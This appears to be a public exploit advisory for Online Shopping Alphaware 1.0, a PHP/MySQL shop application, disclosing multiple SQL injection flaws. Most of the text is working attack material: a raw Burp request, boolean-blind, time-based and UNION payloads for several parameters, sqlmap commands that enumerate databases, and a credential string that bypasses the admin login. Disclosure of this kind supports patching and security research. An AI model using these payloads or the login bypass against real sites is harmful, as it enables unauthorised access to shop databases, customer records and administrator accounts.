Online Shopping Alphaware 1.0 SQL Injection

Online Shopping Alphaware version 1.0 suffers from multiple remote SQL injection vulnerabilities. Original discovery of SQL injection in this version attributed to Ahmed Abbas.


MD5 | 204f998c116fde2ccd7e7f83d5a48685

# Exploit Title: Online Shopping Alphaware 1.0  -  Multiple SQL Injection Vulnerabilty
# Date: 2020-8-4
# Exploit Author: Edo Maland
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql
# Version: 1.0
# Tested On Windows & Linux Server

-------------------------------------------------------------------------------------------------------------------------------------

# Vulnerable file: summary.php
# Vulnerable parameter :
- tid

# PoC

URL : http://example.com/alphaware/summary.php?tid=1337 [SQLi]

# Burpsuite Requests

GET /alphaware/summary.php?tid=-3488%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7171626a71%2C%28CASE%20WHEN%20%28VERSION%28%29%20LIKE%200x254d61726961444225%29%20THEN%201%20ELSE%200%20END%29%2C0x716b706b71%29%2CNULL%2CNULL--%20- HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (X11; U; Linux x86_64; ja; rv:1.9.1.4) Gecko/20091016 SUSE/3.5.4-1.1.2 Firefox/3.5.4
Cookie: PHPSESSID=tp5rtgrqhq6mtcgrlv2ouo583n
Host: example.com
Accept: */*
Accept-encoding: gzip,deflate
Connection: close


# Payload

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://example.com/alphaware/summary.php?tid=73' AND 4766=4766 AND 'eIaZ'='eIaZ
Vector: AND [INFERENCE]

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://example.com/alphaware/summary.php?tid=73' AND (SELECT 5482 FROM (SELECT(SLEEP(5)))PeLB) AND 'zQKr'='zQKr
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: http://example.com/alphaware/summary.php?tid=-4244' UNION ALL SELECT NULL,NULL,CONCAT(0x7171626a71,0x6573676f5948464d524243677248444168457a566250595976774178415053687041507a69507642,0x716b706b71),NULL,NULL-- -
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL-- -



# Sqlmap

sqlmap -u "http://example.com/alphaware/summary.php?tid=1337*" --dbs --random-agent -v 3


-------------------------------------------------------------------------------------------------------------------------------------

# Vulnerable file: confirm.php
# Vulnerable parameter :
- id

# PoC

URL : http://example.com/alphaware/admin/confirm.php?id=0*[SQLi]


# Payload

Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://example.com/alphaware/admin/confirm.php?id=0' AND (SELECT 1002 FROM (SELECT(SLEEP(5)))Yjjs) AND 'uFRa'='uFRa


# Sqlmap


sqlmap -u "http://example.com/alphaware/admin/confirm.php?id=0*" --dbs --random-agent -v 3

-------------------------------------------------------------------------------------------------------------------------------------

# Vulnerable file: details.php
# Vulnerable parameter : id

# PoC

URL : http://example.com/alphaware/details.php?id=1337 [SQLi]


# Payload

Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://example.com/alphaware/details.php?id=1337' AND (SELECT 6801 FROM (SELECT(SLEEP(5)))ogoi) AND 'vASd'='vASd
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: http://example.com/alphaware/details.php?id=1337' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71766b7871,0x6350686f52454b775559486d4a456859414a61424a6c724b72624f6d4554555471764a4d724a726f,0x71716b7171),NULL,NULL-- -
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY],NULL,NULL-- -

# Sqlmap

sqlmap -u "http://example.com/alphaware/details.php?id=1337*" --dbs --random-agent -v 3



-------------------------------------------------------------------------------------------------------------------------------------

# Vulnerable file: confirm.php
# Vulnerable parameter :
- id

# PoC

URL :
- http://example.com/alphaware/admin/confirm.php?id=0*[SQLi]
- http://example.com/alphaware/admin/cancel.php?id=[SQLi]
- http://example.com/alphaware/admin/receipt.php?tid=[SQLi]



# Payload

Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://example.com/alphaware/admin/confirm.php?id=0' AND (SELECT 1002 FROM (SELECT(SLEEP(5)))Yjjs) AND 'uFRa'='uFRa


# Sqlmap

sqlmap -u "http://example.com/alphaware/admin/confirm.php?id=0*" --dbs --random-agent -v 3



-------------------------------------------------------------------------------------------------------------------------------------

URL : http://example.com/alphaware/admin/

Bypass Login Using SQL on Admin/Member

Logging in with following details:
Username : ' or ''='
Password : ' or ''='



Related Posts